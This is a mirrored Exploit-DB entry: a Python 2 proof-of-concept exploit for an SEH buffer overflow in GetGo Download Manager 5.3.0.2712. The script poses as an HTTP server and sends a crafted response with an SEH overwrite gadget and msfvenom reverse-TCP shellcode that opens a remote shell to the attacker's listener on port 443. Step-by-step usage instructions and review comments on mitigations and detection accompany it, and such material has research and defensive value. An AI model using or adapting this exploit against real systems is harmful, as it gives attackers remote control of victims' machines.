GetGo Download Manager 5.3.0.2712 – Buffer Overflow (SEH)

  • 作者: bzyo
    日期: 2018-02-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44187/
  • #!/usr/bin/python
    
    #
    # Exploit Author: bzyo
    # Twitter: @bzyo_
    # Exploit Title: GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow (SEH)
    # Date: 02-24-2018
    # Vulnerable Software: GetGo Download Manager 5.3.0.2712
    # Vendor Homepage: http://www.getgosoft.com/
    # Version: 5.3.0.2712
    # Software Link: https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe
    # Tested On: Windows XP SP3
    #
    #
    # PoC: 
    # 1. setup listener 443 on attacking machine
    # 2. run script on attacking machine
    # 3. open app on victim machine
    # 4. go to download
    # 5. select new, add http://attackerip to URL, index.html to File Name, and select OK
    # 6. check listener, remote shell
    #
    # NOTE(review): this is a client-side bug. The script acts as the HTTP
    # *server*; the vulnerable download manager connects to it and the
    # oversized response it receives overwrites an SEH record on the client's
    # stack. Written for Python 2 (print statements, str as byte buffer); it
    # is not valid Python 3 and is kept here as a historical record.
    # Defensive notes: the hard-coded handler address below points into
    # msacm32.drv, so the technique presumably relies on that module being
    # loaded at a fixed address without SafeSEH on the XP SP3 target (not
    # confirmed here); exception-handler validation (SafeSEH/SEHOP), DEP and
    # ASLR on current Windows builds change the picture. On the wire the
    # trigger is easy to recognise: an HTTP "response" of three ~4 KB lines
    # made almost entirely of repeated "A"/"D" filler bytes.
    
    import sys
    import socket
    import os
    import time
    
    # Address/port the script listens on; the victim is pointed at http://<host>.
    host = "192.168.0.149"
    port = 80
     
    # Single-client blocking TCP listener standing in for a web server.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    print "\n[+] listening on %d ..." % port
    
    # Block until the download manager connects.
    bz, addr = s.accept()
    print "[+] connection accepted from %s" % addr[0]
    
    # 20 bytes of padding; the SEH record (nseh, seh) follows immediately after.
    junk = "A"*20
    
    #jump 6 
    # nSEH: "\xeb\x06" is a short JMP +6, stepping over the handler pointer into
    # the bytes that follow; the two NOPs pad the 4-byte slot.
    nseh = "\xeb\x06\x90\x90"
    
    #0x72d11f39 : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [msacm32.drv]
    # SEH handler pointer, little-endian encoding of the gadget address above.
    seh = "\x39\x1f\xd1\x72"
    
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -b "\x00" -f c
    #Payload size: 351 bytes
    # Encoded stage generated by the msfvenom command above; \x00 was excluded
    # as a bad character, which is why the blob is self-decoding.
    reverse = (
    "\xba\x8f\xf6\x0e\x24\xd9\xf7\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
    "\x52\x31\x50\x12\x83\xc0\x04\x03\xdf\xf8\xec\xd1\x23\xec\x73"
    "\x19\xdb\xed\x13\x93\x3e\xdc\x13\xc7\x4b\x4f\xa4\x83\x19\x7c"
    "\x4f\xc1\x89\xf7\x3d\xce\xbe\xb0\x88\x28\xf1\x41\xa0\x09\x90"
    "\xc1\xbb\x5d\x72\xfb\x73\x90\x73\x3c\x69\x59\x21\x95\xe5\xcc"
    "\xd5\x92\xb0\xcc\x5e\xe8\x55\x55\x83\xb9\x54\x74\x12\xb1\x0e"
    "\x56\x95\x16\x3b\xdf\x8d\x7b\x06\xa9\x26\x4f\xfc\x28\xee\x81"
    "\xfd\x87\xcf\x2d\x0c\xd9\x08\x89\xef\xac\x60\xe9\x92\xb6\xb7"
    "\x93\x48\x32\x23\x33\x1a\xe4\x8f\xc5\xcf\x73\x44\xc9\xa4\xf0"
    "\x02\xce\x3b\xd4\x39\xea\xb0\xdb\xed\x7a\x82\xff\x29\x26\x50"
    "\x61\x68\x82\x37\x9e\x6a\x6d\xe7\x3a\xe1\x80\xfc\x36\xa8\xcc"
    "\x31\x7b\x52\x0d\x5e\x0c\x21\x3f\xc1\xa6\xad\x73\x8a\x60\x2a"
    "\x73\xa1\xd5\xa4\x8a\x4a\x26\xed\x48\x1e\x76\x85\x79\x1f\x1d"
    "\x55\x85\xca\xb2\x05\x29\xa5\x72\xf5\x89\x15\x1b\x1f\x06\x49"
    "\x3b\x20\xcc\xe2\xd6\xdb\x87\xcc\x8f\xe3\xc2\xa5\xcd\xe3\xed"
    "\x8e\x5b\x05\x87\xe0\x0d\x9e\x30\x98\x17\x54\xa0\x65\x82\x11"
    "\xe2\xee\x21\xe6\xad\x06\x4f\xf4\x5a\xe7\x1a\xa6\xcd\xf8\xb0"
    "\xce\x92\x6b\x5f\x0e\xdc\x97\xc8\x59\x89\x66\x01\x0f\x27\xd0"
    "\xbb\x2d\xba\x84\x84\xf5\x61\x75\x0a\xf4\xe4\xc1\x28\xe6\x30"
    "\xc9\x74\x52\xed\x9c\x22\x0c\x4b\x77\x85\xe6\x05\x24\x4f\x6e"
    "\xd3\x06\x50\xe8\xdc\x42\x26\x14\x6c\x3b\x7f\x2b\x41\xab\x77"
    "\x54\xbf\x4b\x77\x8f\x7b\x7b\x32\x8d\x2a\x14\x9b\x44\x6f\x79"
    "\x1c\xb3\xac\x84\x9f\x31\x4d\x73\xbf\x30\x48\x3f\x07\xa9\x20"
    "\x50\xe2\xcd\x97\x51\x27")
    
    # Pad so that reverse + fill is always 4055 bytes; the whole payload is
    # therefore a fixed 4083 bytes regardless of the stage length.
    fill = "D"*(4055 - len(reverse))
    
    payload = junk + nseh + seh + reverse + fill
    
    # The same payload is sent as three lines, CR-separated and CRLF-terminated;
    # presumably to hit the client's line parser regardless of which header
    # line it treats as the first one — not verified here.
    buffer = payload + "\r"
    buffer+= payload + "\r"
    buffer+= payload + "\r\n"
    
    # Consume (and echo) the client's HTTP request, then answer with the buffer.
    print bz.recv(1000)
    bz.send(buffer)
    print "[+] sending buffer ok\n"
    
    # Give the client time to read everything before tearing the socket down.
    time.sleep(3)
    bz.close()
    s.close()